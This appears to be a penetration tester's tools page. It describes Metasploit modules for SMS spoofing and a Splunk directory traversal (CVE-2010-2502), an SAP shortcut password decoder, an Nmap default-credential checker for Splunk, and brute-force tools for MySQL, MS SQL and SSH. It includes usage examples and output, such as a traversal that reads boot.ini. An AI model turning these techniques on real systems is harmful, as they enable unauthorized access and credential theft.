Coming soon, see recent blog post for more details.
Metasploit SMS Spoof Module
Here is a Metasploit Aux module for spoofing SMS. It uses the UK provider Click SMS (you will need an account and agree to their terms of service).
SAP Easy Access Password Decoder
Users can create a authenticated shortcut to their SAP session using the Easy Access GUI. This shortcut is generally a .sap file that contains the path to the easy access binary, their username and an encoded format of their password. sap_decoder.rb is a ruby script that will decode the password and display the clear-text value.
The supported character set is A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!` up to a max length of eight characters.
Example usage:
sap_decoder.rb PW_15F87F4D93F33508
[+] Decoded password: myles456
Splunk Metasploit Module - Directory Traversal
This is a metasploit auxiliary module for the directory traversal vulnerability in the Splunk management interface (CVE-2010-2502). I did not find this vulnerability, I believe it was discovered by a chap called aaron. It does not require authentication and affects Splunk 4.0.0 - 4.0.10 and Splunk 4.1.0 - 4.1.1.
It is very simple to use, just point it at the RHOST, you can also configure what file to retrieve and what the installation path for Splunk is.
msf auxiliary(splunk_directory_traversal) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(splunk_directory_traversal) > exploit
[*] http://127.0.0.1/en-US/static/app/gettingstarted/:8000 - Checking if server is vulnerable
[+] Server is vulnerable
[+] [boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Splunk Nmap Script - Default Credential Check
Splunkbuster is a Nmap script that will locate a Splunk installation and attempt to authenticate with the default values (admin:changeme). It was written for Splunk 4.1.5 but assuming the auth does not change much then it should be good for others. The reason that the existing Nmap script for Http-Brute forcing can not be used is that Splunk uses a "cval" cookie value kind of like a CSRF protection, so I extract this value from an initial GET request then submit it with the login POST.
Usage:
nmap --scripts splunkbuster -p 8000 -iL splunkTargets.txt
Output:
-- 8000/tcp open
-- | splunkbuster: Checking for splunk..
-- | [+] Splunk discovered..
-- |_ [+] Credentials discovered (admin:changeme)
MySQL Windows Command Exec
Java GUI application that will brute forces MySQL and provides command execution by importing a user defined function in c:\windows\system32\. I coded this before both sqlmap/sqlninja did similar things and now metasploit has great support for this - this should actually read - project deprecated.
MS SQL Shell
Java GUI application for automating brute force attacks against SQL Server. Once valid credentials are obtained it can connect and re-enable xp_cmdshell which it wraps to execute system shell commands. It also supports Windows integrated authentication, so can be useful if you break out of a Citrix environment and need a connect back to the local SQL instance without valid credentials.
SSH Joey Checker
Java GUI tool to check a list of hosts for default accounts via SSH. It automates a "joey" check, which is the same password as the username. Excellent for finding weak user accounts across a large list of SSH servers.
